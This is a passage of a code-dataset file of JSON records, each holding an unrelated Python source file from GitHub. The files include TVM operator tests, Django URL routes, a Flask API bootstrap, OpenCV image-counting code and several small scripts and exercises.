Malawi_chk['cluster_id']=Malawi_chk.apply(addcolumn,Year=Year,Pop_in_Clus=Pop_in_Clus,axis=1)\r\n Malawi_chk=Malawi_chk[['geometry', '2020_pop_1', '2021_pop_1', '2022_pop_1','2023_pop_1', 'cluster_id']] \r\n #Malawi_chk['geometry']=Malawi_chk.buffer(0.01)\r\n Malawi_chk=Malawi_chk.dissolve(by='cluster_id',aggfunc='sum',as_index=False) \r\n if Malawi_prep.shape[0]==Malawi_chk.shape[0] and Flag==False:\r\n #nearest_point+=1\r\n Flag=True\r\n continue\r\n elif Malawi_prep.shape[0]==Malawi_chk.shape[0] and Flag==True:\r\n nearest_point+=1\r\n Flag=False\r\n continue\r\n nearest_point=2\r\n Malawi_prep=Malawi_chk\r\n Flag=False\r\n return Malawi_chk\r\n","repo_name":"DialUsers/Dial_CDR","sub_path":"Dial Malawi Analytics Scripts/Phase_2_Scripts/Package/Cluster_Creation.py","file_name":"Cluster_Creation.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"45559687233","text":"import numpy as np\nimport tvm\nimport topi\nimport topi.testing\nfrom topi.util import get_const_tuple\n\n\ndef test_operator_type_and_tags():\n k = 1\n n = tvm.var('n')\n A = tvm.placeholder((), name='A')\n B = tvm.placeholder((10, 5), name='B')\n B1 = B[0]\n B2 = B[0,0]\n\n assert isinstance(k + n, tvm.expr.Expr)\n assert isinstance(n + n, tvm.expr.Expr)\n assert isinstance(k + A, tvm.tensor.Tensor)\n assert isinstance(A + k, tvm.tensor.Tensor)\n assert isinstance(n + A, tvm.tensor.Tensor)\n assert isinstance(A + n, tvm.tensor.Tensor)\n assert isinstance(A + A, tvm.tensor.Tensor)\n\n assert isinstance(k + B, tvm.tensor.Tensor)\n assert isinstance(B + k, tvm.tensor.Tensor)\n assert isinstance(n + B, tvm.tensor.Tensor)\n assert isinstance(B + n, tvm.tensor.Tensor)\n assert isinstance(A + B, tvm.tensor.Tensor)\n assert isinstance(B + A, tvm.tensor.Tensor)\n assert isinstance(B + B, tvm.tensor.Tensor)\n\n assert (k + B).op.tag == topi.tag.ELEMWISE\n assert (B + k).op.tag == topi.tag.ELEMWISE\n assert (n + B).op.tag == topi.tag.ELEMWISE\n assert (B + n).op.tag == topi.tag.ELEMWISE\n assert (A + B).op.tag == topi.tag.BROADCAST\n assert (B + A).op.tag == topi.tag.BROADCAST\n assert (B + B).op.tag == topi.tag.BROADCAST\n\n assert isinstance(k + B2, tvm.expr.Expr)\n assert isinstance(B2 + k, tvm.expr.Expr)\n assert isinstance(n + B2, tvm.expr.Expr)\n assert isinstance(B2 + n, tvm.expr.Expr)\n assert isinstance(B2 + B2, tvm.expr.Expr)\n assert isinstance(B2 + A, tvm.tensor.Tensor)\n assert isinstance(A + B2, 
tvm.tensor.Tensor)\n assert isinstance(B2 + B, tvm.tensor.Tensor)\n assert isinstance(B + B2, tvm.tensor.Tensor)\n\n\ndef test_combination():\n k = 3\n n = 5\n m = 10\n x = tvm.var('x')\n A = tvm.placeholder((n, m), name='A')\n B = tvm.placeholder((n, m), name='B')\n C = tvm.placeholder((n, m), name='C')\n D = k + A - B * C / x\n s = tvm.create_schedule(D.op)\n foo = tvm.build(s, [x, A, B, C, D], \"llvm\")\n ctx = tvm.cpu(0)\n x = 2\n a = tvm.nd.array(np.random.uniform(size=(n, m)).astype(A.dtype), ctx)\n b = tvm.nd.array(np.random.uniform(size=(n, m)).astype(B.dtype), ctx)\n c = tvm.nd.array(np.random.uniform(size=(n, m)).astype(C.dtype), ctx)\n d = tvm.nd.array(np.zeros((n, m), dtype=D.dtype), ctx)\n foo(x, a, b, c, d)\n np.testing.assert_allclose(d.asnumpy(), k + a.asnumpy() - b.asnumpy() * c.asnumpy() / x)\n\n\ndef verify_tensor_scalar_bop(shape, typ=\"add\"):\n \"\"\"Verify non-constant Tensor and scalar binary operations.\"\"\"\n sh = [tvm.var('n%d' % i) for i in range(0, len(shape))]\n k = tvm.var('k')\n A = tvm.placeholder(sh, name='A')\n if typ == \"add\":\n B = A + k\n elif typ == \"sub\":\n B = A - k\n elif typ == \"mul\":\n B = A * k\n elif typ == \"div\":\n B = A / k\n else:\n raise NotImplementedError()\n\n def check_device(device):\n ctx = tvm.context(device, 0)\n if not ctx.exist:\n print(\"Skip because %s is not enabled\" % device)\n return\n print(\"Running on target: %s\" % device)\n with tvm.target.create(device):\n s = topi.generic.schedule_elemwise(B)\n\n k_ = 2\n foo = tvm.build(s, [A, B, k] + sh, device, name=\"tensor_scalar_\" + typ)\n a_npy = np.random.uniform(size=shape).astype(A.dtype)\n if typ == \"add\":\n b_npy = a_npy + k_\n elif typ == \"sub\":\n b_npy = a_npy - k_\n elif typ == \"mul\":\n b_npy = a_npy * k_\n elif typ == \"div\":\n b_npy = a_npy / k_\n else:\n raise NotImplementedError()\n\n a_nd = tvm.nd.array(a_npy, ctx)\n b_nd = tvm.nd.array(np.empty(b_npy.shape).astype(B.dtype), ctx)\n foo(a_nd, b_nd, k_, *shape)\n np.testing.assert_allclose(b_nd.asnumpy(), b_npy, rtol=1e-5)\n\n for device in ['llvm', 'cuda', 'opencl', 'metal', 'rocm', 'vulkan']:\n check_device(device)\n\n\ndef verify_broadcast_bop(lhs_shape, rhs_shape, typ=\"add\"):\n A = tvm.placeholder(shape=lhs_shape, name=\"A\")\n B = tvm.placeholder(shape=rhs_shape, name=\"B\")\n if typ == \"add\":\n C = A + B\n elif typ == \"sub\":\n C = A - B\n elif typ == \"mul\":\n C = A * B\n elif typ == \"div\":\n C = A / B\n else:\n raise NotImplementedError()\n\n def check_device(device):\n ctx = tvm.context(device, 0)\n if not ctx.exist:\n print(\"Skip because %s is not enabled\" % device)\n return\n print(\"Running on target: %s\" % device)\n with tvm.target.create(device):\n s = topi.generic.schedule_broadcast(C)\n\n foo = tvm.build(s, [A, B, C], device, name=\"broadcast_binary\" + \"_\" + typ)\n lhs_npy = np.random.uniform(size=lhs_shape).astype(A.dtype)\n rhs_npy = np.random.uniform(size=rhs_shape).astype(A.dtype)\n if typ == \"add\":\n out_npy = lhs_npy + rhs_npy\n elif typ == \"sub\":\n out_npy = lhs_npy - rhs_npy\n elif typ == \"mul\":\n out_npy = lhs_npy * rhs_npy\n elif typ == \"div\":\n rhs_npy = np.abs(rhs_npy) + 0.001\n out_npy = lhs_npy / rhs_npy\n else:\n raise NotImplementedError()\n\n lhs_nd = tvm.nd.array(lhs_npy, ctx)\n rhs_nd = tvm.nd.array(rhs_npy, ctx)\n out_nd = tvm.nd.array(np.empty(out_npy.shape).astype(B.dtype), ctx)\n for _ in range(1):\n foo(lhs_nd, rhs_nd, out_nd)\n np.testing.assert_allclose(out_nd.asnumpy(), out_npy, rtol=1E-4, atol=1E-4)\n\n for device in ['llvm', 'cuda', 
'opencl', 'metal', 'rocm', 'vulkan']:\n check_device(device)\n\n\ndef verify_conv2d_scalar_bop(batch, in_size, in_channel, num_filter, kernel, stride, padding, typ=\"add\"):\n def check_device(device):\n ctx = tvm.context(device, 0)\n if not ctx.exist:\n print(\"Skip because %s is not enabled\" % device)\n return\n print(\"Running on target: %s\" % device)\n\n k = 10.0\n with tvm.target.create(device):\n A = tvm.placeholder((batch, in_channel, in_size, in_size), name='A')\n W = tvm.placeholder((num_filter, in_channel, kernel, kernel), name='W')\n B = topi.nn.conv2d(A, W, stride, padding)\n if typ == \"add\":\n C = B + k\n elif typ == \"sub\":\n C = B - k\n elif typ == \"mul\":\n C = B * k\n elif typ == \"div\":\n C = B / k\n else:\n raise NotImplementedError()\n s = topi.generic.schedule_conv2d_nchw([C])\n\n foo = tvm.build(s, [A, W, B, C], device, name=\"conv2d_scalar_\" + typ)\n\n a_npy = np.random.uniform(size=get_const_tuple(A.shape)).astype(A.dtype)\n w_npy = np.random.uniform(size=get_const_tuple(W.shape)).astype(W.dtype)\n b_npy = topi.testing.conv2d_nchw_python(a_npy, w_npy, stride, padding)\n c_npy = np.random.uniform(size=get_const_tuple(B.shape)).astype(B.dtype)\n if typ == \"add\":\n c_npy = b_npy + k\n elif typ == \"sub\":\n c_npy = b_npy - k\n elif typ == \"mul\":\n c_npy = b_npy * k\n elif typ == \"div\":\n c_npy = b_npy / k\n else:\n raise NotImplementedError()\n\n a_nd = tvm.nd.array(a_npy, ctx)\n w_nd = tvm.nd.array(w_npy, ctx)\n b_nd = tvm.nd.array(np.empty(b_npy.shape).astype(B.dtype), ctx)\n c_nd = tvm.nd.array(np.empty(c_npy.shape).astype(C.dtype), ctx)\n foo(a_nd, w_nd, b_nd, c_nd)\n np.testing.assert_allclose(c_nd.asnumpy(), c_npy, rtol=1E-4, atol=1E-4)\n\n for device in ['llvm', 'cuda', 'opencl', 'metal', 'rocm', 'vulkan']:\n check_device(device)\n\n\ndef test_tensor_scalar_bop():\n verify_tensor_scalar_bop((1,), typ=\"add\")\n verify_tensor_scalar_bop((3, 5), typ=\"sub\")\n verify_tensor_scalar_bop((1, 3, 5), typ=\"mul\")\n verify_tensor_scalar_bop((2, 3, 1, 32), typ=\"div\")\n\n\ndef test_broadcast_bop():\n verify_broadcast_bop((2, 3), (), typ=\"add\")\n verify_broadcast_bop((5, 2, 3), (1,), typ=\"add\")\n verify_broadcast_bop((1, 32), (64, 32), typ=\"sub\")\n verify_broadcast_bop((5, 64, 128), (2, 5, 64, 1), typ=\"mul\")\n verify_broadcast_bop((2, 3, 1, 32), (64, 32), typ=\"div\")\n\n\ndef test_conv2d_scalar_bop():\n verify_conv2d_scalar_bop(1, 16, 4, 4, 3, 1, 1, typ=\"add\")\n verify_conv2d_scalar_bop(1, 32, 2, 1, 3, 1, 1, typ=\"sub\")\n verify_conv2d_scalar_bop(1, 32, 1, 1, 3, 1, 1, typ=\"mul\")\n verify_conv2d_scalar_bop(1, 16, 2, 1, 3, 1, 1, typ=\"div\")\n\n\nif __name__ == \"__main__\":\n test_operator_type_and_tags()\n test_combination()\n test_tensor_scalar_bop()\n test_broadcast_bop()\n test_conv2d_scalar_bop()\n","repo_name":"researchmm/tasn","sub_path":"tasn-mxnet/3rdparty/tvm/tests/python/unittest/test_lang_tensor_overload_op.py","file_name":"test_lang_tensor_overload_op.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"76"} +{"seq_id":"74112923125","text":"from django.urls import path\nfrom . 
import views\n\napp_name = \"clientes\"\n\nurlpatterns = [\n    path(\"registro/\", views.cliente_registro, name=\"cliente_registro\"),\n    path(\"actualizar/\", views.cliente_actualizar, name=\"cliente_actualizar\"),\n    path(\"consultas/\", views.consulta_lista, name=\"consulta_list\"),\n    path(\"consultas/crear/\", views.consulta_registro, name=\"consulta_create\"),\n    path(\"consultas/editar//\", views.consulta_actualizar, name=\"consulta_update\"),\n    path(\"consultas/eliminar//\", views.consulta_excluir, name=\"consulta_delete\"), \n    path('consultas/generar_informe_clientes_pdf/', views.generar_informe_clientes_pdf, name='generar_informe_clientes_pdf'),\n    path(\"consulta/laboratorio/\", views.consulta_laboratorio, name=\"consulta_laboratorio\"), \n]\n","repo_name":"WilliamLex/RESERVASORIGINALFINAL","sub_path":"clientes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"42102039310","text":"from itertools import permutations as pmt\ndef calculation(left,right,mathex):\n    if mathex == '+':\n        result = int(left) + int(right)\n    elif mathex == '-':\n        result = int(left) - int(right)\n    elif mathex == '*':\n        result = int(left) * int(right)\n    return result\n\ndef solution(expression):\n    cals = [\"+\",\"-\",\"*\"]\n    perms = list(pmt(cals,3))\n    mathBasket = []\n    exBasket = []\n    myDigit = ''\n    answer = 0\n    for i in range(len(expression)):\n        if i == len(expression) - 1:\n            myDigit += expression[i]\n            myDigit = int(myDigit)\n            mathBasket.append(myDigit)\n        elif expression[i].isdigit():\n            myDigit += expression[i]\n        else:\n            myDigit = int(myDigit)\n            mathBasket.append(myDigit)\n            myDigit = ''\n            exBasket.append(expression[i])\n    for i in range(6):\n        cal = perms[i]\n        myExpress = exBasket[:]\n        myMath = mathBasket[:]\n        for j in range(3):\n            mathEx = cal[j]\n            while myExpress and mathEx in myExpress:\n                idx = myExpress.index(mathEx)\n                A = myMath.pop(idx)\n                B = myMath.pop(idx)\n                C = myExpress.pop(idx)\n                result = calculation(A,B,C)\n                myMath.insert(idx, result)\n        if answer < abs(myMath[0]):\n            answer = abs(myMath[0])\n    return answer\n\n\n# Another person's solution..\ndef solution2(expression):\n    operations = [('+', '-', '*'),('+', '*', '-'),('-', '+', '*'),('-', '*', '+'),('*', '+', '-'),('*', '-', '+')]\n    answer = []\n    for op in operations:\n        a = op[0]\n        b = op[1]\n        temp_list = []\n        for e in expression.split(a):\n            temp = [f\"({i})\" for i in e.split(b)]\n            print(temp)\n            temp_list.append(f'({b.join(temp)})')\n        answer.append(abs(eval(a.join(temp_list))))\n    return max(answer)\n","repo_name":"DailyCodingMem/DailyCoding","sub_path":"jong0717/programmers/lv2/lv2-35_수식최대화.py","file_name":"lv2-35_수식최대화.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
+{"seq_id":"24012803508","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport sys\nfrom setuptools import setup\n\nif sys.version_info < (3, 6):\n    sys.exit(\n        'Python < 3.6 is not supported. 
You are using Python {}.{}.'.format(\n sys.version_info[0], sys.version_info[1])\n )\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n# To update the package version number, edit claml2transmart/__version__.py\nversion = {}\nwith open(os.path.join(here, 'claml2transmart', '__version__.py')) as f:\n exec(f.read(), version)\n\nwith open('README.rst') as readme_file:\n readme = readme_file.read()\n\nwith open('requirements.txt', 'r') as f:\n required_packages = f.read().splitlines()\n\nsetup(\n name='claml2transmart',\n version=version['__version__'],\n description=\"Example ClaML to TranSMART loader\",\n long_description=readme + '\\n\\n',\n author=\"Gijs Kant\",\n author_email='gijs@thehyve.nl',\n url='https://github.com/thehyve/python_claml2transmart',\n packages=[\n 'claml2transmart',\n ],\n package_dir={'claml2transmart':\n 'claml2transmart'},\n entry_points={\n 'console_scripts': ['claml2transmart=claml2transmart.claml2transmart:main'],\n },\n include_package_data=True,\n license=\"MIT\",\n zip_safe=False,\n keywords='claml2transmart',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'Topic :: Scientific/Engineering :: Bio-Informatics',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n ],\n test_suite='tests',\n python_requires='>=3.6.0',\n install_requires=required_packages,\n setup_requires=[\n 'pygments',\n # dependency for `python setup.py test`\n 'pytest-runner',\n # dependencies for `python setup.py build_sphinx`\n 'sphinx',\n 'sphinx_rtd_theme',\n 'recommonmark',\n # dependency for `python setup.py bdist_wheel`\n 'wheel'\n ],\n tests_require=[\n 'pytest',\n 'pytest-cov',\n 'pycodestyle',\n ],\n extras_require={\n 'dev': ['prospector[with_pyroma]', 'yapf', 'isort'],\n }\n)\n","repo_name":"thehyve/python_claml2transmart","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"74052238005","text":"#!/usr/bin/env python2\nimport nd2reader\nfrom sys import argv\nimport pickle\nimport numpy as np\n\nscript, nd2 = argv\n\n# nd2 = nd2reader.Nd2(str(nd2))\n\n# dapi = []\n# fitc = []\n# fitclong = []\n# cy3 = []\n# bfcy3 = []\n\n# for image in nd2.select(channels = 'DAPI'):\n# dapi.append(image)\n\n# for image in nd2.select(channels = 'FITC'):\n# fitc.append(image)\n\n# for image in nd2.select(channels = 'FITClong'):\n# fitclong.append(image)\n\n# for image in nd2.select(channels = 'CY3'):\n# cy3.append(image)\n\n# for image in nd2.select(channels = 'BF-Cy3'):\n# bfcy3.append(image)\n\nim_name_pickle = str(nd2).replace('.nd2', '.pkl')\nnd2 = nd2reader.Nd2(str(nd2))\n\nimg_dict = {'DAPI' : {},\n\t\t\t'FITC' : {},\n\t\t\t'FITClong' : {},\n\t\t\t'CY3' : {},\n\t\t\t'BF-Cy3' : {}}\n\n# nd2 = nd2reader.Nd2(IMAGE_DIR+'/'+img_path)\n\n\n# nd2 = nd2reader.Nd2(img_path)\n\n# print nd2.fields_of_view\n\nfor i in range(len(nd2)):\n\tchannel = nd2[i].channel\n\tfov = nd2[i].field_of_view\n\t# img_dict[channel][fov] = nd2[i]\n\timg_dict[channel][fov] = nd2[i].astype(np.uint16) \n\t# / np.amax(nd2[i]).astype(np.uint16)\n\npickle.dump(img_dict, open(im_name_pickle, 
'w'))\n\n","repo_name":"gkreder/tequila_mockingbird_2","sub_path":"nd2_gabe.py","file_name":"nd2_gabe.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"19192194325","text":"import numpy as np\nimport cv2\n#from skimage.feature import peak_local_max\n#from skimage.morphology import watershed\n#from scipy import ndimage\nimport time\nimport math\n\n# miteThruv9b version of 19/01/20\n# version of 24/01/20 : added ant detection\n\nsubstractor = cv2.createBackgroundSubtractorMOG2(history = 100, varThreshold=25, detectShadows=True)\n\ndef bugcount(img,masque, aire_min, aire_max, mode = \"hide\"):\n\tfourmi = False\n\tif mode == \"show\":\n\t\tcv2.imshow('image brute',img) # ajtp\n\t\tcv2.imshow('masque brute',masque) # ajtp\n\t\t#key = cv2.waitKey(0)\n\t# filtering\n\tgray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\t# background removal \n\tbkgd_sup = substractor.apply(gray)\n\tif mode == \"show\":\n\t\tcv2.imshow('suppression arrière plan',bkgd_sup) # ajtp\n\t\t#key = cv2.waitKey(0)\n\t# \"doonut\" masking\n\tmasque2 = cv2.bitwise_and(bkgd_sup , masque , mask=None)\n\tif mode == \"show\":\n\t\tcv2.imshow('masque',masque2) # ajtp\n\t\t#key = cv2.waitKey(0)\n\t\t\n\t# contour detection\n\t_, contours, _ = cv2.findContours(masque2.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\tcercles=[]\n\tfor c in contours:\n\t\tM = cv2.moments(c)\n\t\taire = (M['m00'])\n\t\tif ((aire > aire_min) and (aire <= aire_max )): \n\t\t\tcentre = ((M['m10']/M['m00']), (M['m01']/M['m00']))\n\t\t\trayon = math.sqrt(aire/math.pi)\n\t\t\tcercle = (centre, rayon)\n\t\t\tcercles.append(cercle)\n\t\tif (aire > aire_max):\n\t\t\tfourmi = True\n\tif mode == \"debug\":\n\t\tprint(\"[INFO] {} unique segments found\".format(len(cercles))) \n\n\treturn (cercles, fourmi)\n\n","repo_name":"LR69/MiteThru","sub_path":"raspberry/src/img_count_utils.py","file_name":"img_count_utils.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"6366242112","text":"from __future__ import absolute_import\n\nfrom django.conf.urls import url\nfrom rest_framework import routers\n\nfrom . 
import views\n\nrouter = routers.SimpleRouter()\nrouter.register(r'videos', views.videos.VideoViewSet)\nrouter.register(r'videos/(?P[\\w\\d]+)/languages',\n views.subtitles.SubtitleLanguageViewSet,\n base_name='subtitle-language')\nrouter.register(r'videos/(?P[\\w\\d]+)/urls',\n views.videos.VideoURLViewSet, base_name='video-url')\nrouter.register(r'teams', views.teams.TeamViewSet, base_name='teams')\nrouter.register(r'teams/(?P[\\w\\d\\-]+)/members',\n views.teams.TeamMemberViewSet, base_name='team-members')\nrouter.register(r'teams/(?P[\\w\\d\\-]+)/projects',\n views.teams.ProjectViewSet, base_name='projects')\nrouter.register(r'teams/(?P[\\w\\d\\-]+)/tasks',\n views.teams.TaskViewSet, base_name='tasks')\nrouter.register(r'teams/(?P[\\w\\d\\-]+)/applications',\n views.teams.TeamApplicationViewSet,\n base_name='team-application')\nrouter.register(r'teams/(?P[\\w\\d\\-]+)/notifications',\n views.teams.TeamNotificationViewSet,\n base_name='team-notifications')\nrouter.register(r'users', views.users.UserViewSet, base_name='users')\nrouter.register(r'activity', views.activity.ActivityViewSet,\n base_name='activity')\n\nurlpatterns = router.urls + [\n url(r'^$', views.index.index, name='index'),\n url(r'videos/(?P[\\w\\d]+)/activity/$',\n views.activity.VideoActivityView.as_view(), name='video-activity'),\n url(r'^videos/(?P[\\w\\d]+)'\n '/languages/(?P[\\w-]+)/subtitles/$',\n views.subtitles.SubtitlesView.as_view(), name='subtitles'),\n url(r'^videos/(?P[\\w\\d]+)'\n '/languages/(?P[\\w-]+)/subtitles/actions/$',\n views.subtitles.Actions.as_view(), name='subtitle-actions'),\n url(r'^videos/(?P[\\w\\d]+)'\n '/languages/(?P[\\w-]+)/subtitles/notes/$',\n views.subtitles.NotesList.as_view(), name='subtitle-notes'),\n url(r'videos/(?P[\\w\\d]+)/duration',\n views.videos.VideoDurationView.as_view(), name='video-duration'),\n url(r'videos/(?P[\\w\\d]+)/follow',\n views.videos.VideoFollowerView.as_view(), name='video-follow'),\n url(r'^videos/(?P[\\w\\d]+)'\n '/languages/(?P[\\w-]+)/follow$',\n views.subtitles.LanguageFollowerView.as_view(), name='language-follow'),\n url(r'^teams/(?P[\\w\\d\\-]+)/languages/$',\n views.teams.team_languages, name='team-languages'),\n url(r'teams/(?P[\\w\\d\\-]+)/languages/preferred/',\n views.teams.TeamPreferredLanguagesView.as_view(),\n name='team-languages-preferred'),\n url(r'teams/(?P[\\w\\d\\-]+)/languages/blacklisted/',\n views.teams.TeamBlacklistedLanguagesView.as_view(),\n name='team-languages-blacklisted'),\n url(r'^languages/$', views.languages.languages, name='languages'),\n url(r'^message/$', views.messages.Messages.as_view(), name='messages'),\n url(r'users/(?P[^/]+)/activity/$',\n views.activity.UserActivityView.as_view(), name='user-activity'),\n url(r'teams/(?P[\\w\\d-]+)/activity/$',\n views.activity.TeamActivityView.as_view(), name='team-activity'),\n]\n","repo_name":"jasonboulware/Tardigrades","sub_path":"TestAutomation/project/unisubs/apps/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"39198447930","text":"#!/usr/bin/python\n\"\"\"\nAPI bootstrap file\n\"\"\"\nfrom flask import Flask, jsonify\nimport sys\nimport os\nimport argparse\n\nsys.path.insert(0, os.path.dirname(\n os.path.realpath(__file__)) + '/../../../../lib')\nsys.path.insert(0, os.path.dirname(\n os.path.realpath(__file__)) + '/../../../../conf')\n\nfrom inspired_config import SQLALCHEMY_DATABASE_URI\nfrom database import init_engine, 
db_session\n\n\ndef create_app(uri):\n    \"\"\" dynamically create the app \"\"\"\n    app = Flask(__name__)\n    #app.config.from_pyfile(config)\n    app.config['SQLALCHEMY_DATABASE_URI'] = uri\n    #init_engine(app.config['SQLALCHEMY_DATABASE_URI'], pool_recycle=3600, \n        #echo=True)\n    init_engine(app.config['SQLALCHEMY_DATABASE_URI'], pool_recycle=3600)\n\n    @app.teardown_appcontext\n    def shutdown_session(exception=None):\n        db_session.remove()\n\n    @app.errorhandler(400)\n    @app.errorhandler(404)\n    @app.errorhandler(405)\n    @app.errorhandler(500)\n    def default_error_handle(error=None):\n        \"\"\" handle all errors with json output \"\"\"\n        return jsonify(error=error.code, message=str(error), success=False),\\\n            error.code\n\n    ## add each api Blueprint and create the base route\n    from inspired.v1.api.artists.views import artists\n    from inspired.v1.api.product_types.views import product_types\n    from inspired.v1.api.users.views import users\n    from inspired.v1.api.scenes.views import scenes\n    from inspired.v1.api.videos.views import videos\n    from inspired.v1.api.products.views import products\n    from inspired.v1.api.product_styles.views import product_styles\n    app.register_blueprint(artists, url_prefix=\"/api/v1/artists\")\n    app.register_blueprint(product_types, url_prefix=\"/api/v1/product_types\")\n    app.register_blueprint(users, url_prefix=\"/api/v1/users\")\n    app.register_blueprint(scenes,url_prefix=\"/api/v1/scene\")\n    app.register_blueprint(videos, url_prefix=\"/api/v1/videos\")\n    app.register_blueprint(products, url_prefix=\"/api/v1/products\")\n    app.register_blueprint(product_styles, url_prefix=\"/api/v1/product_styles\")\n\n    return app\n\n\ndef bootstrap(**kwargs):\n    \"\"\"bootstraps the application. can handle setup here\"\"\"\n    app = create_app(SQLALCHEMY_DATABASE_URI)\n    app.debug = True\n    app.run(host=kwargs['host'], port=kwargs['port'])\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--host\", help=\"Hostname or IP address\",\n                        dest=\"host\", type=str, default='0.0.0.0')\n    parser.add_argument(\"--port\", help=\"Port number\",\n                        dest=\"port\", type=int, default=8000)\n    kwargs = parser.parse_args()\n    bootstrap(**kwargs.__dict__)\n","repo_name":"phriscage/inspired","sub_path":"lib/inspired/v1/api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"11764579772","text":"'''Write a program that computes the factorial of an integer provided by the user. \nE.g.: 5!=5.4.3.2.1=120 '''\n\nnum = int(input(\"Digite um número qualquer para ser calculado o seu fatorial: \\n\"))\n\nfat = num\naux = num - 1\n \nwhile aux > 1 : \n    fat = fat * aux\n    aux = aux - 1\n\nprint(\"Fatorial de {} é {}\".format(num, fat))\n","repo_name":"whyohane/estudos","sub_path":"python.org/Lista de Estrutura de Repetição/questao17.py","file_name":"questao17.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"14965889523","text":"\"\"\"\n\nVerification of the 2D shear (also called single 2D vortex) verification case. \n\nPublications: \n\n    Comminal, R., Spangenberg, J., & Hattel, J. H. (2015). Cellwise conservative unsplit advection \n    for the volume of fluid method. 
Journal of Computational Physics, 283, 582–608.\n\n\"\"\" \n\nfrom lent_error import * \nimport sys\n\ndef main(): \n\n    templateCase = sys.argv[1] \n\n    # Reduce all dataFrames in all advectionErrors.dat files in all subdirectories.\n    data = reduce_dataframe(\"advectionErrors.dat\", templateCase)\n    \n    # Calculate and insert convergence columns \n    add_convergence(data)\n    \n    # En and O(En) are not needed for this test case in the thesis.\n    data.drop('CFL', axis=1, inplace=True)\n    data.drop('O(En)', axis=1, inplace=True)\n    data.drop('En', axis=1, inplace=True)\n    latexData = data.to_latex(float_format=scientific)\n    latexData = latexData.replace(\"nan\",'-')\n    \n    print(latexData)\n    \n    tableFileName = table_file_name(templateCase) \n    \n    latexFile = open(tableFileName + \".tex\", \"w\")\n    latexFile.write(latexData)\n\n    csvFile = open(tableFileName + \".csv\", 'w')\n    csvFile.write(data.to_csv()) \n    \nif __name__==\"__main__\":\n    main()\n","repo_name":"CRC-1194/lent","sub_path":"cases/advection/2Dshear/2Dshear-errors-analyze.py","file_name":"2Dshear-errors-analyze.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"29956183589","text":"import requests\ncity = '@6801'\nurl = 'https://aqicn.org/feed' + city + '/?token='\napi_key = 'b77d3aeca61a0cd899a2a90d6ea4219e72efdd5d'\n\nmain_url = url + api_key\nr = requests.get(main_url)\ndata = r.json()['data']\naqi = data['aqi']\niaqi = data['iaqi']\ndew = iaqi.get('dew','Nil')\nno2 = iaqi.get('no2','Nil')\no3 = iaqi.get('o3','Nil')\nso2 = iaqi.get('so2','Nil')\npm10 = iaqi.get('pm10','Nil')\npm25 = iaqi.get('pm25','Nil')\npollen = iaqi.get('pol','Nil')\n\nprint(f'{city}Jakość powietrza w Olesno:',aqi,'\\n')\nprint('')\nprint('Dew :',dew['v'])\nprint('no2 :',no2['v'])\nprint('Ozone :',o3['v'])\nprint('sulphur :',so2['v'])\nprint('pm10 :',pm10['v'])\nprint('pm25 :',pm25['v'])","repo_name":"Rajo03/Portfolio","sub_path":"PYTHON/1PRACE/PROjekty/powietrze.py","file_name":"powietrze.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"34354747854","text":"\n\nfrom geom.point import *\n\nraw = [ (2,2), (0,5), (8,0), (9,8), (7,14),\n        (13,12), (14,13) ]\npoints = [ Point(p[0], p[1]) for p in raw]\n\ndef get_shortest(all_points):\n    min_dist = 5000\n    for p1 in all_points:\n        for p2 in all_points:\n            if p1 is not p2:\n                d = p2 - p1\n                if d < min_dist:\n                    min_dist = d\n    return min_dist\n\nprint(get_shortest(points))\n","repo_name":"chancekoogler/PointRegionQuadTree","sub_path":"min-dist.py","file_name":"min-dist.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
